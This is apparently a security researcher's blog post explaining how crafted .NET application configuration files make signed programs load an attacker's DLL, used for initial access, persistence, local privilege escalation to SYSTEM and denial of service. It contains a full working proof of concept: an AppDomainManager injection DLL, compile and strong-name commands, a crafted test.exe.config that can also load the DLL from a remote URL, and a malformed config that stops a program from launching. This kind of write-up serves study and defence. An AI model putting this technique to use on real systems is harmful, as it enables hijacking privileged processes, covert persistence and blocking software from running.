Abusing .NET app.config for initial access, persistence, privilege escalation and denial of service
This one is about a neat technique which is still not very well known at the time of writing. It was presented to me as a method for gaining initial access, and quite quickly I realized it can also come in handy in other scenarios: persistence, privilege escalation and denial of service.
UPDATE: I just came across this article https://www.rapid7.com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/, which refers to this mechanism as AppDomain Manager Injection.
Application Configuration Files
The mechanism goes by a rather general name - Application Configuration Files (https://learn.microsoft.com/en-us/windows/win32/sbscs/application-configuration-files), which are one of the four so-called Side-by-side (SxS) manifest types (https://learn.microsoft.com/en-us/windows/win32/sbscs/manifests). Quoting verbatim from MSDN:
"An application configuration file is an XML file used to control assembly binding. It can redirect an application from using one version of a side-by-side assembly to another version of the same assembly. This is called per-application configuration."
So what does this look like in practice?
Let's consider the following, extremely simple C# "application":
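Something along these lines is enough:

// test.cs - a do-nothing .NET console program, just enough to give us a managed process to watch in Procmon
using System;

class Program
{
    static void Main()
    {
        Console.WriteLine("Hello from test.exe");
    }
}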
We can compile it by simply running csc, e.g.:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe test.cs
Now, before we execute it, let's run Procmon and create just one monitoring rule: Path contains test.exe:
Once we run the executable and then look into Procmon output, we should notice references to a file named test.exe.config:
So upon invoking test.exe, both the Client/Server Runtime Subsystem (csrss.exe) and the executable itself search for a file named test.exe.config - the Application Configuration File. If that file exists and contains valid XML, as documented in the MSDN reference, various runtime behaviors can be changed. The one we are especially interested in is the ability to make the relevant process load an arbitrary DLL file (in .NET referred to as an "assembly").
Case #1 - initial access.
I learned about this mechanism and its application for initial access by stumbling upon this project: https://github.com/Mr-Un1k0d3r/.NetConfigLoader. The idea could be described as the .NET version of DLL side-loading. We pick a well-known, benign and digitally signed executable and deliver it with a maliciously crafted .config file, which upon execution makes the new process load a DLL with our code. An additional advantage for attackers is that the DLL can be hosted remotely over HTTP and fetched dynamically. This makes the payload more difficult to detect and analyze, while giving the attacker more control over it and its distribution. This use case is documented by Mr-Un1k0d3r on his project's page, so I am referring you there if this is what you are looking for.
Case #2 - persistence.
You might already know one of my previous articles - https://hackingiscool.pl/pe-import-table-hijacking-as-a-way-of-achieving-persistence-or-exploiting-dll-side-loading/. So it is not surprising that when I saw this, I immediately thought about using this mechanism for persistence. From the technical perspective, the only challenge is to find a .NET executable that is run frequently - manually by users, as a scheduled task, an autorun entry or by any other means. The whole point of choosing this method is evasion. Since all we drop on disk is an XML file with a .config extension and, optionally (if we do not host the DLL remotely), a DLL file in a location readable by our targets (a world-readable one if we are targeting regular users), this method is less likely to get us caught.
Case #3 - privilege escalation.
Now, as I have recently been playing more with privilege escalation on Windows, I also immediately thought about abusing this mechanism in scenarios where a privileged process is executed from a directory we can create new files in. You know, our favorite locations such as C:\Windows\Temp, C:\Users\Public or C:\ProgramData, as by default everyone can create new files in them. So whenever a process hits any of those paths in its executable search order (https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa) or DLL search order (https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order) - which in most cases happens when the executable being called is located in that directory - we, as attackers, have an opportunity to simply create our own executable or DLL file with the expected name and have it loaded by the process we want to hijack.
Creation of malicious .config files is just another flavor of this attack, applicable to .NET executables.
Let's see how this works in practice by creating a little proof of concept.
First, let's copy the previous test.exe example into C:\Users\Public, where every user can create new files. Note that I did this as a user called "win10":
Eventually we will run this process as SYSTEM (using psexec).
Now, keep in mind that in this scenario, by default, Interactive Users can modify this newly created file - due to the permissions automatically inherited from the C:\Users\Public directory. Therefore exploitation for LPE is possible for regular users by simply overwriting the file, or by moving it and creating a new one named test.exe. But let's pretend that we don't have this permission, or even revoke it from the file for the sake of the app.config LPE PoC:
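The exact command may differ depending on your setup, but with icacls it boils down to stripping the inherited ACEs:

icacls C:\Users\Public\test.exe /inheritance:r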
Since all the ACEs on the test.exe file created in C:\Users\Public were inherited, this will effectively remove all of them, revoking any type of access from everyone:
So additionally I granted full control to the owner (win10) and SYSTEM.
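Again with icacls, that can look like this (the account names match my test machine):

icacls C:\Users\Public\test.exe /grant win10:F /grant SYSTEM:F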
Now just to confirm that our other (non-administrative) user named "normal" has no access to the file whatsoever:
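A simple way to check is to open a shell as "normal" and try to read the file, which should fail with an access-denied error:

runas /user:normal cmd
type C:\Users\Public\test.exe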
LPE POC
OK, so how do we go about creating our privilege escalation exploit?
We will create two files:
- A DLL (.NET assembly) that will simply attempt to create a new text file named POC.txt in C:\Windows (only Administrators and SYSTEM can do that - remember, eventually we will run the target process (test.exe) as SYSTEM, using psexec). Our attacker - "normal" - will trick the process into loading this DLL by crafting a proper test.exe.config file.
- A test.exe.config Application Configuration File, referring to the DLL.
Here's the DLL:
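The exact code does not matter much; a sketch like the one below does the job (the class name POCDLL is my choice - it just has to match the appDomainManagerType value we will put into the .config file later):

// POCDLL.cs - a .NET assembly exposing an AppDomainManager; InitializeNewDomain
// runs inside the hijacked process as soon as its default AppDomain is set up
using System;
using System.IO;

public sealed class POCDLL : AppDomainManager
{
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
        try
        {
            // C:\Windows is writable only by Administrators/SYSTEM by default,
            // so this file appearing proves our code ran inside the elevated process
            File.WriteAllText(@"C:\Windows\POC.txt",
                "Code execution as " + Environment.UserName);
        }
        catch
        {
            // fail silently so the host process keeps behaving normally
        }
        base.InitializeNewDomain(appDomainInfo);
    }
}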
Now, before we compile it, we first need to generate a Strong Name Key File (https://learn.microsoft.com/en-us/biztalk/core/how-to-configure-a-strong-name-assembly-key-file) for it. Do not confuse this with Authenticode digital signatures (https://learn.microsoft.com/en-us/windows-hardware/drivers/install/authenticode); these are two different things.
To generate the key file, we use the sn.exe tool from Visual Studio. Depending on your version of Visual Studio, adjust the path accordingly. After generating the key, we will have to point to it while compiling the assembly.
On my system the commands were, respectively:
"C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\x64\sn.exe" -k key.snk
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:POCDLL.dll /t:library /keyfile:key.snk POCDLL.cs
OK, now we need to extract the strong name from the POCDLL.dll file. We will need it when crafting the .config XML file.
An easy way to do this is with PowerShell, by invoking:
[System.Reflection.AssemblyName]::GetAssemblyName("C:\Users\Public\POCDLL.dll").FullName
The output I got for mine:
POCDLL, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cafc9db063be6f14
Finally, we create our test.exe.config file:
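The file, which we will save as test.exe.config, is built around the documented appDomainManagerAssembly / appDomainManagerType elements; a minimal version filled in with the values from this walkthrough could look like this (the numbered comments mark the spots described in the points below):

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <!-- the assembly name and (2) the strong name public key token extracted above -->
        <assemblyIdentity name="POCDLL" culture="neutral" publicKeyToken="cafc9db063be6f14" />
        <!-- (3) where to load the assembly from; an http:// href works here as well -->
        <codeBase version="0.0.0.0" href="file:///C:/Users/Public/POCDLL.dll" />
      </dependentAssembly>
    </assemblyBinding>
    <appDomainManagerAssembly value="POCDLL, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cafc9db063be6f14" />
    <!-- (4) the AppDomainManager class defined in POCDLL.cs -->
    <appDomainManagerType value="POCDLL" />
  </runtime>
</configuration>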
1 - The name of the target executable, without the extension.
2 - The strong name public key token.
3 - The path to our DLL (it can also be an href pointing to a remote location such as http://server); in this case it is local, also located in C:\Users\Public.
4 - The name of the main class in our .NET DLL file (assembly).
We save it in the same directory as the executable we want to attack - in this case C:\Users\Public.
Both files - test.exe.config and POCDLL.dll - are created and owned by our regular user - "normal".
Now, before we launch test.exe as SYSTEM, using psexec, let's start Procmon first. This time the rule set we are interested in is:
- Path contains test.exe.
- Path ends with POC.txt.
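To launch the target as SYSTEM, an elevated PsExec invocation along these lines does the job:

psexec.exe -accepteula -s -i C:\Users\Public\test.exe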
Aaaand action!
Case #4 - denial of service.
Now, there is just one more case I found this mechanism "useful" for. What if we're not dealing with a .NET application, but a regular PE consisting of unmanaged code?
Let's see what happens if we copy - let's say ping.exe - to C:\Users\Public and then create an invalid ping.exe.config file:
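Anything that is not well-formed XML will do - for example, a truncated file like this:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <runtime>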
Now let's try to run it, from the same SYSTEM session, to prove impact across security identities:
We can see that instead of help we got an error message:
"The application has failed to start because its side-by-side configuration is incorrect. Please see the application event log or use the command-line sxstrace.exe tool for more detail."
So, even if an application is not built on .NET, the corresponding .config file is still checked and parsed by csrss.exe (as visible in the third screenshot at the beginning of this article). And if parsing fails, the process won't start. So, if everything else fails and we can't inject our own code into the process, at least we can keep it from starting. Just for the fun of it.